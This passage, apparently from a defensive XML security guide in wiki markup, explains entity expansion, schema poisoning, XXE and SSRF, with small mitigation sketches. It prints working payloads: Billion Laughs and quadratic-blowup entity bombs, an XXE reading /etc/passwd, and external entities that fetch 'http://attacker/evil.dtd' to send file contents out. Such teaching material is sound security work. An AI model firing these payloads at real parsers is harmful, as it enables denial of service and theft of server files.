The assertion guarantees that the &amp;lt;tt&amp;gt;denominator&amp;lt;/tt&amp;gt; will not contain the value zero as a valid number and also allows negative numbers to be a valid denominator.&lt;br /&gt;
&lt;br /&gt;
==== Occurrences ====&lt;br /&gt;
Leaving the maximum number of occurrences undefined can force an application to cope with an extreme number of items to process. Two attributes specify minimum and maximum limits: &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt;. The default value for both the &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; and the &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt; attributes is &amp;lt;tt&amp;gt;1&amp;lt;/tt&amp;gt;, but certain elements may require other values. For instance, if a value is optional, it could contain a &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; of 0, and if there is no limit on the maximum amount, it could contain a &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt; of &amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt;, as in the following example:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;operation&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;buy&amp;quot; '''maxOccurs'''=&amp;quot;'''unbounded'''&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
       &amp;lt;xs:all&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
       &amp;lt;/xs:all&amp;gt;&lt;br /&gt;
      &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
     &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous schema includes a root element named &amp;lt;tt&amp;gt;operation&amp;lt;/tt&amp;gt;, which can contain an unlimited (&amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt;) number of &amp;lt;tt&amp;gt;buy&amp;lt;/tt&amp;gt; elements. This is a common finding, since developers do not normally want to restrict the maximum number of occurrences. Applications using limitless occurrences should test what happens when they receive an extremely large number of elements to be processed. Since computational resources are limited, the consequences should be analyzed and eventually a maximum number ought to be used instead of an &amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt; value.&lt;br /&gt;
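&lt;br /&gt;
A bounded variant of the &amp;lt;tt&amp;gt;buy&amp;lt;/tt&amp;gt; declaration inside the sequence might look like the following sketch. The limit of 100 is an arbitrary assumption; an appropriate value depends on how many items the application can safely process:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;buy&amp;quot; '''maxOccurs'''=&amp;quot;'''100'''&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:all&amp;gt;&lt;br /&gt;
    &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:all&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;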
&lt;br /&gt;
== Jumbo Payloads ==&lt;br /&gt;
Sending an XML document of 1GB requires only a second of server processing and might not be worth consideration as an attack. Instead, an attacker would look for a way to minimize the CPU and traffic used to generate this type of attack, compared to the overall amount of server CPU or traffic used to handle the requests.&lt;br /&gt;
&lt;br /&gt;
=== Traditional Jumbo Payloads ===&lt;br /&gt;
There are two primary methods to make a document larger than normal:&lt;br /&gt;
* Depth attack: using a huge number of elements, element names, and/or element values.&lt;br /&gt;
* Width attack: using a huge number of attributes, attribute names, and/or attribute values.&lt;br /&gt;
In most cases, the overall result will be a huge document. This is a short example of what this looks like:&lt;br /&gt;
 &amp;lt;SOAPENV:ENVELOPE XMLNS:SOAPENV=&amp;quot;HTTP://SCHEMAS.XMLSOAP.ORG/SOAP/ENVELOPE/&amp;quot; XMLNS:EXT=&amp;quot;HTTP://COM/IBM/WAS/WSSAMPLE/SEI/ECHO/B2B/EXTERNAL&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;SOAPENV:HEADER '''LARGENAME1'''=&amp;quot;'''LARGEVALUE'''&amp;quot; '''LARGENAME2'''=&amp;quot;'''LARGEVALUE2'''&amp;quot; '''LARGENAME3'''=&amp;quot;'''LARGEVALUE3'''&amp;quot; …&amp;gt;&lt;br /&gt;
  ...&lt;br /&gt;
&lt;br /&gt;
=== &amp;quot;Small&amp;quot; Jumbo Payloads ===&lt;br /&gt;
The following example is a very small document, but the results of processing this could be similar to those of processing traditional jumbo payloads. The purpose of such a small payload is that it allows an attacker to send many documents fast enough to make the application consume most or all of the available resources:&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ENTITY '''file''' SYSTEM &amp;quot;'''http://attacker/huge.xml'''&amp;quot; &amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;root&amp;gt;'''&amp;amp;file;'''&amp;lt;/root&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Schema Poisoning ==&lt;br /&gt;
When an attacker is capable of introducing modifications to a schema, there could be multiple high-risk consequences. In particular, the effect of these consequences will be more dangerous if the schemas are using DTD (e.g., file retrieval, denial of service). An attacker could exploit this type of vulnerability in numerous scenarios, always depending on the location of the schema. &lt;br /&gt;
&lt;br /&gt;
=== Local Schema Poisoning ===&lt;br /&gt;
Local schema poisoning happens when schemas are available in the same host, whether or not the schemas are embedded in the same XML document.&lt;br /&gt;
&lt;br /&gt;
==== Embedded Schema ====&lt;br /&gt;
The most trivial type of schema poisoning takes place when the schema is defined within the same XML document. Consider the following, unknowingly vulnerable example provided by the W3C:&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE note [&lt;br /&gt;
  &amp;lt;!ELEMENT note (to,from,heading,body)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT to (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT from (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT heading (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT body (#PCDATA)&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
 &amp;lt;/note&amp;gt;&lt;br /&gt;
&lt;br /&gt;
All restrictions on the note element could be removed or altered, allowing the sending of any type of data to the server. Furthermore, if the server is processing external entities, the attacker could use the schema, for example, to read remote files from the server. This type of schema only serves as a suggestion for sending a document, but it must contain a way to check the embedded schema integrity to be used safely.&lt;br /&gt;
Attacks through embedded schemas are commonly used to exploit external entity expansions. Embedded XML schemas can also assist in port scans of internal hosts or brute force attacks.&lt;br /&gt;
&lt;br /&gt;
==== Incorrect Permissions ====&lt;br /&gt;
You can often circumvent the risk of using remotely tampered versions by processing a local schema. &lt;br /&gt;
 &amp;lt;!DOCTYPE note SYSTEM &amp;quot;'''note.dtd'''&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
 &amp;lt;/note&amp;gt;&lt;br /&gt;
&lt;br /&gt;
However, if the local schema does not contain the correct permissions, an internal attacker could alter the original restrictions. The following line exemplifies a schema using permissions that allow any user to make modifications:&lt;br /&gt;
 -rw-rw-'''rw-'''  1 user  staff  743 Jan 15 12:32 '''note.dtd'''&lt;br /&gt;
&lt;br /&gt;
The permissions set on &amp;lt;tt&amp;gt;note.dtd&amp;lt;/tt&amp;gt; allow any user on the system to make modifications. This vulnerability is clearly not related to the structure of an XML document or a schema, but since these documents are commonly stored in the filesystem, it is worth mentioning that an attacker could exploit this type of problem.&lt;br /&gt;
&lt;br /&gt;
=== Remote Schema Poisoning ===&lt;br /&gt;
Schemas defined by external organizations are normally referenced remotely. If capable of diverting or accessing the network’s traffic, an attacker could cause a victim to fetch a distinct type of content rather than the one originally intended. &lt;br /&gt;
&lt;br /&gt;
==== Man-in-the-Middle (MitM) Attack ====&lt;br /&gt;
When documents reference remote schemas using the unencrypted Hypertext Transfer Protocol (HTTP), the communication is performed in plain text, so an attacker could sniff the connection and modify the schema before it reaches the end user:&lt;br /&gt;
 &amp;lt;!DOCTYPE note SYSTEM &amp;quot;'''http'''://example.com/note.dtd&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
 &amp;lt;/note&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The remote file &amp;lt;tt&amp;gt;note.dtd&amp;lt;/tt&amp;gt; could be susceptible to tampering when transmitted over unencrypted HTTP. One tool available to facilitate this type of attack is mitmproxy.&lt;br /&gt;
&lt;br /&gt;
==== DNS-Cache Poisoning ====&lt;br /&gt;
Remote schema poisoning may also be possible even when using encrypted protocols like Hypertext Transfer Protocol Secure (HTTPS). When software performs reverse Domain Name System (DNS) resolution on an IP address to obtain the hostname, it may not properly ensure that the IP address is truly associated with the hostname. In this case, the software enables an attacker to redirect content to their own Internet Protocol (IP) addresses.&lt;br /&gt;
The previous example referenced the host example.com using an unencrypted protocol. When switching to HTTPS, the location of the remote schema will look like https://example.com/note.dtd. In a normal scenario, example.com resolves to the IP address 1.1.1.1:&lt;br /&gt;
 $ host example.com&lt;br /&gt;
 example.com has address 1.1.1.1&lt;br /&gt;
&lt;br /&gt;
If an attacker compromises the DNS being used, the previous hostname could now point to a new, different IP controlled by the attacker (2.2.2.2):&lt;br /&gt;
 $ host example.com&lt;br /&gt;
 example.com has address '''2.2.2.2'''&lt;br /&gt;
&lt;br /&gt;
When accessing the remote file, the victim may be actually retrieving the contents of a location controlled by an attacker.&lt;br /&gt;
&lt;br /&gt;
==== Evil Employee Attack ====&lt;br /&gt;
When third parties host and define schemas, the contents are not under the control of the schemas’ users. Any modifications introduced by a malicious employee—or an external attacker in control of these files—could impact all users processing the schemas. Subsequently, attackers could affect the confidentiality, integrity, or availability of other services (especially if the schema in use is DTD).  &lt;br /&gt;
&lt;br /&gt;
== XML Entity Expansion ==&lt;br /&gt;
If the parser uses a DTD, an attacker might inject data that may adversely affect the XML parser during document processing. These adverse effects could include the parser crashing or accessing local files.&lt;br /&gt;
&lt;br /&gt;
=== Recursive Entity Reference ===&lt;br /&gt;
When the definition of an entity &amp;lt;tt&amp;gt;A&amp;lt;/tt&amp;gt; refers to another entity &amp;lt;tt&amp;gt;B&amp;lt;/tt&amp;gt;, and entity &amp;lt;tt&amp;gt;B&amp;lt;/tt&amp;gt; is in turn defined in terms of entity &amp;lt;tt&amp;gt;A&amp;lt;/tt&amp;gt;, the schema describes a circular reference between entities:&lt;br /&gt;
 &amp;lt;!DOCTYPE A [&lt;br /&gt;
  &amp;lt;!ELEMENT A ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY A &amp;quot;&amp;lt;A&amp;gt;&amp;amp;B;&amp;lt;/A&amp;gt;&amp;quot;&amp;gt; &lt;br /&gt;
  &amp;lt;!ENTITY B &amp;quot;&amp;amp;A;&amp;quot;&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;A&amp;gt;'''&amp;amp;A;'''&amp;lt;/A&amp;gt;&lt;br /&gt;
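&lt;br /&gt;
The XML specification requires parsers to reject recursive entity references, and detecting them amounts to finding a cycle in the graph of entity definitions. The following Python sketch illustrates that idea; it assumes the references have already been extracted into a dictionary, and the function name &amp;lt;tt&amp;gt;find_entity_cycle&amp;lt;/tt&amp;gt; is hypothetical:&lt;br /&gt;

```python
def find_entity_cycle(references):
    """Return one circular chain of entity names, or None if there is none.

    references maps each entity name to the names its definition refers to.
    """
    finished = set()

    def visit(name, path):
        if name in path:
            # The chain came back to an entity that is still being expanded.
            return path[path.index(name):] + [name]
        if name in finished:
            return None
        for target in references.get(name, []):
            cycle = visit(target, path + [name])
            if cycle:
                return cycle
        finished.add(name)
        return None

    for entity in references:
        cycle = visit(entity, [])
        if cycle:
            return cycle
    return None


# Entities from the example above: A refers to B, and B refers back to A.
print(find_entity_cycle({"A": ["B"], "B": ["A"]}))  # ['A', 'B', 'A']
```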
&lt;br /&gt;
=== Quadratic Blowup ===&lt;br /&gt;
Instead of defining multiple small, deeply nested entities, the attacker in this scenario defines one very large entity and refers to it as many times as possible, resulting in a quadratic expansion (O(n^2)). The result of the following attack will be 100,000*100,000 characters in memory.&lt;br /&gt;
 &amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ELEMENT root ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY A &amp;quot;AAAAA...(100,000 A's)...AAAAA&amp;quot;&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;root&amp;gt;'''&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;...(100,000 &amp;amp;A;'s)...&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;'''&amp;lt;/root&amp;gt;&lt;br /&gt;
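&lt;br /&gt;
The arithmetic behind this attack can be worked through in a few lines of Python. This is only an estimate: the constant names are made up for illustration, and the size of the DTD wrapper and tags is ignored:&lt;br /&gt;

```python
ENTITY_LENGTH = 100_000    # characters in the replacement text of entity A
REFERENCE_COUNT = 100_000  # times the document body refers to A
REFERENCE_LENGTH = 3       # characters in one reference: ampersand, "A", semicolon

# Approximate size of what the attacker sends (DTD and tags are ignored).
sent_chars = ENTITY_LENGTH + REFERENCE_COUNT * REFERENCE_LENGTH
# Size of the text after every reference has been expanded.
expanded_chars = ENTITY_LENGTH * REFERENCE_COUNT

print(sent_chars)                    # 400000
print(expanded_chars)                # 10000000000
print(expanded_chars // sent_chars)  # 25000
```

Under these assumptions, a document of roughly 400,000 characters expands to 25,000 times its own size.&lt;br /&gt;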
&lt;br /&gt;
=== Billion Laughs ===&lt;br /&gt;
When an XML parser tries to resolve the nested entities included within the following code, the application will start consuming all of the available memory until the process crashes. This is an example XML document with an embedded DTD schema including the attack:&lt;br /&gt;
 &amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ELEMENT root ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL &amp;quot;LOL&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL1 &amp;quot;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL2 &amp;quot;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL3 &amp;quot;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL4 &amp;quot;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL5 &amp;quot;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL6 &amp;quot;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL7 &amp;quot;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL8 &amp;quot;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL9 &amp;quot;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;quot;&amp;gt; &lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;root&amp;gt;'''&amp;amp;LOL9;'''&amp;lt;/root&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The entity &amp;lt;tt&amp;gt;LOL9&amp;lt;/tt&amp;gt; will be resolved as the 10 &amp;lt;tt&amp;gt;LOL8&amp;lt;/tt&amp;gt; entities it references; then each of these will be resolved as 10 &amp;lt;tt&amp;gt;LOL7&amp;lt;/tt&amp;gt; entities, and so on. Finally, the CPU and/or memory will be affected by expanding the 10^9 (1,000,000,000) copies of &amp;lt;tt&amp;gt;LOL&amp;lt;/tt&amp;gt;, that is 3*10^9 (3,000,000,000) characters, which could make the parser crash.&lt;br /&gt;
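&lt;br /&gt;
The growth can be checked with a short calculation. The Python sketch below counts the expansion level by level; the constant and function names are hypothetical:&lt;br /&gt;

```python
BASE_TEXT = "LOL"  # replacement text of the innermost entity
FAN_OUT = 10       # references inside each LOL1..LOL9 definition
LEVELS = 9         # LOL1 through LOL9


def expanded_copies(levels, fan_out):
    """Count how many copies of the base text one top-level reference yields."""
    copies = 1
    for _ in range(levels):
        copies *= fan_out
    return copies


copies = expanded_copies(LEVELS, FAN_OUT)
print(copies)                   # 1000000000
print(copies * len(BASE_TEXT))  # 3000000000
```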
&lt;br /&gt;
The Simple Object Access Protocol (SOAP) specification forbids DTDs completely. This means that a SOAP processor can reject any SOAP message that contains a DTD. Despite this specification, certain SOAP implementations did parse DTD schemas within SOAP messages. The following example illustrates a case where the parser is not following the specification, enabling a reference to a DTD in a SOAP message:&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE SOAP-ENV:Envelope [ &lt;br /&gt;
  &amp;lt;!ELEMENT SOAP-ENV:Envelope ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ATTLIST SOAP-ENV:Envelope ENTITYREFERENCE CDATA #IMPLIED&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL &amp;quot;LOL&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL1 &amp;quot;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL2 &amp;quot;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL3 &amp;quot;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL4 &amp;quot;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL5 &amp;quot;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL6 &amp;quot;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL7 &amp;quot;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL8 &amp;quot;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL9 &amp;quot;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;quot;&amp;gt;&lt;br /&gt;
 ]&amp;gt; &lt;br /&gt;
 &amp;lt;SOAP:Envelope ENTITYREFERENCE=&amp;quot;'''&amp;amp;LOL9;'''&amp;quot; xmlns:SOAP=&amp;quot;http://schemas.xmlsoap.org/soap/envelope/&amp;quot;&amp;gt; &lt;br /&gt;
  &amp;lt;SOAP:Body&amp;gt; &lt;br /&gt;
   &amp;lt;KEYWORD xmlns=&amp;quot;URN:PARASOFT:WS:STORE&amp;quot;&amp;gt;FOO&amp;lt;/KEYWORD&amp;gt;&lt;br /&gt;
  &amp;lt;/SOAP:Body&amp;gt;&lt;br /&gt;
 &amp;lt;/SOAP:Envelope&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Reflected File Retrieval ===&lt;br /&gt;
Consider the following example code of an XXE:&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;ISO-8859-1&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ELEMENT root ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY '''xxe''' SYSTEM &amp;quot;'''/etc/passwd'''&amp;quot;&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;root&amp;gt;'''&amp;amp;xxe;'''&amp;lt;/root&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous XML defines an external entity named &amp;lt;tt&amp;gt;xxe&amp;lt;/tt&amp;gt; whose replacement text is the contents of &amp;lt;tt&amp;gt;/etc/passwd&amp;lt;/tt&amp;gt;; the entity is expanded within the &amp;lt;tt&amp;gt;root&amp;lt;/tt&amp;gt; tag. If the parser allows references to external entities, it might include the contents of that file in the XML response or in the error output.&lt;br /&gt;
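&lt;br /&gt;
Whether the file is retrieved depends on how the parser is configured. As one illustration, the sketch below switches off external entity loading in Python's standard &amp;lt;tt&amp;gt;xml.sax&amp;lt;/tt&amp;gt; module. The function name &amp;lt;tt&amp;gt;make_hardened_parser&amp;lt;/tt&amp;gt; is hypothetical, and other parsers expose different settings:&lt;br /&gt;

```python
import xml.sax
from xml.sax.handler import feature_external_ges, feature_external_pes


def make_hardened_parser():
    """Create a SAX parser that does not load external entities."""
    parser = xml.sax.make_parser()
    # Do not fetch external general entities such as the xxe entity above.
    parser.setFeature(feature_external_ges, False)
    # Do not fetch external parameter entities or the external DTD subset.
    parser.setFeature(feature_external_pes, False)
    return parser
```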
&lt;br /&gt;
=== Server Side Request Forgery ===&lt;br /&gt;
Server Side Request Forgery (SSRF) happens when the server receives a malicious XML schema that makes the server retrieve remote resources, such as a file over HTTP, HTTPS, or FTP. SSRF has been used to retrieve remote files, to prove an XXE when the file cannot be reflected back, to perform port scanning, and to perform brute force attacks on internal networks.&lt;br /&gt;
&lt;br /&gt;
==== External Connection ====&lt;br /&gt;
Whenever there is an XXE and you cannot retrieve a file, you can test if you would be able to establish remote connections:&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE root [ &lt;br /&gt;
  &amp;lt;!ENTITY % '''xxe''' SYSTEM &amp;quot;'''http://attacker/evil.dtd'''&amp;quot;&amp;gt; &lt;br /&gt;
  '''%xxe;'''&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== File Retrieval with Parameter Entities ====&lt;br /&gt;
Parameter entities allow for the retrieval of content using URL references. Consider the following malicious XML document:&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;utf-8&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ENTITY % '''file''' SYSTEM &amp;quot;'''file:///etc/passwd'''&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY % '''dtd''' SYSTEM &amp;quot;'''http://attacker/evil.dtd'''&amp;quot;&amp;gt;&lt;br /&gt;
  '''%dtd;'''&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;root&amp;gt;'''&amp;amp;send;'''&amp;lt;/root&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Here the DTD defines two external parameter entities: &amp;lt;tt&amp;gt;file&amp;lt;/tt&amp;gt;, which loads a local file, and &amp;lt;tt&amp;gt;dtd&amp;lt;/tt&amp;gt;, which loads a remote DTD. The remote DTD should contain something like this:&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
